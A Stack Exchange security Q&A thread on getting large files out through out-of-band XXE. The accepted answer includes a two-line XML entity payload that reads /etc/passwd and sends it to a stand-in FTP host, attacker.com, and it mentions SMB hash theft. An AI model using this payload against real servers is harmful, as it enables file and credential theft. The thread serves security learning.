5

Most of examples for extracting files through XXE OOB (Out of Band) sets up a listening HTTP server and listens to incoming request on the URL requested. However, since the URL length is limited to something like 2048, how would you extract larger files through this method, or other OOB methods? Is it possible to perform POST request through XXE OOB?

Ravan87
  • 51
  • 1
  • Hello and welcome to Stack Exchange. That's a fantastic first question! –  Aug 12 '19 at 12:46
  • Curious if `206 Partial Content` would make the vulnerable application send another request. It might also be possible to make the application throw error and retrieve the file content using one of the local DTD as in https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/ – 1lastBr3ath Dec 29 '19 at 03:26

1 Answers1

0

That's a really interesting question, and one that is often overlooked when discussing XXE, where the typical PoC is exfiltrating the /etc/passwd file. According to one source, "Very Large files such as /dev/random and /dev/zero either can’t be retrieved or lead to Denial of Service. This is DoS via XXE." So I think the short answer is since there isn't any logic or script that exists to break up the requests, it's not possible to send a large file over a HTTP GET request without issues. However, it seems like if you are willing to look at some other protocols, you can exfiltrate larger files using FTP.

Instead of making an HTTP request, you could always try making an FTP request with an example like the following:

<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://attacker.com:2222/?data=%data;'>">

Then assuming that you have a listening FTP server then you can pull the data out that way. (More information about this method can be found here) The listed guide also explains how you can steal hashes using the SMB protocol too with responder. Of course, the big drawback here is working with other protocols is trying to get those other ports past the firewall, as HTTP and even DNS is typically allowed which make them ideal.

Tobin Shields
  • 662
  • 1
  • 8
  • 12
  • Considering that neither /dev/random nor /dev/zero are "very large" or, in the most common sense, "files", I'm a little skeptical of that source. You certainly can get DoS by making the application try to read an infinite stream (of random bytes or zeros) - though in practice /dev/random usually limits reads to a fairly short length - but there's absolutely no point in trying to exfiltrate or process the retrieved data, so it doesn't indicate much about whether or not XXE could do so. Also, as with all XML exploits, exact behavior depends on the server-side XML library. – CBHacking Apr 29 '21 at 22:59